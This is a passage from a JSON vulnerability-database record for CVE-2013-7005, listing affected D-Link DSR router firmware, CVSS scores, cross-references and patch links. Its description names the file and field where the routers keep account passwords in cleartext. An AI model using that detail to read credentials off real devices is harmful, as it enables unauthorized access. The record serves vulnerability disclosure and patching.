        "model": "dsr-150n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.05b64"
      },
      {
        "model": "dsr-250",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "model": "dsr-250n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "model": "dsr-500",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-500n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-150 v1.08b44",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n v1.05b64",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250 and dsr-250n v1.08b44",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500 and dsr-500n v1.08b77",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000 and dsr-1000n v1.08b77",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.08b31"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b36"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.02b11"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b12"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.02b25"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b36"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b27"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.05b53"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b12"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.03b23"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "model": "dsr-500n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250n 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n 1.05b64",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "BID",
        "id": "64461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b29",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b29:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b35:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b46:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b50:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b39",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b46:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b56:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b20:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.08b31:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b51",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.01b50:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.04b58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.05b48",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b51",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.04b58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b51",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.01b50:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.04b58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b39",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b46:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b56:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b20:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.08b31:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b51",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.04b58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "64461"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2013-7005",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.9,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2013-7005",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2013-15507",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-67007",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2013-7005",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-15507",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201312-401",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-67007",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#][\"Password\"] fields in /tmp/teamf1.cfg.ascii. D-Link DSR is a wireless service router product. There are multiple information disclosure vulnerabilities in the D-Link DSR Router Series account credentials. Allows an attacker to access sensitive information. The information obtained may lead to further attacks. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "BID",
        "id": "64461"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-7005",
        "trust": 3.4
      },
      {
        "db": "EXPLOIT-DB",
        "id": "30061",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "64461",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "db": "BID",
        "id": "64461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ]
  },
  "id": "VAR-201312-0290",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:08:58.491000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Services Routers",
        "trust": 0.8,
        "url": "http://www.dlink.com/us/en/business-solutions/security/services-routers"
      },
      {
        "title": "\u30eb\u30fc\u30bf\uff0f\u30d5\u30a1\u30a4\u30a2\u30a6\u30a9\u30fc\u30eb",
        "trust": 0.8,
        "url": "http://www.dlink-jp.com/router-firewall"
      },
      {
        "title": "Downloads",
        "trust": 0.8,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "title": "D-Link DSR Router Series account credentials have multiple patches for information disclosure vulnerabilities",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/41954"
      },
      {
        "title": "DSR-250N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47082"
      },
      {
        "title": "DSR-250_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47081"
      },
      {
        "title": "DSR-150N_A2_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47080"
      },
      {
        "title": "DSR-150_A2_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47079"
      },
      {
        "title": "DSR-150_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47078"
      },
      {
        "title": "DSR-1000_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47085"
      },
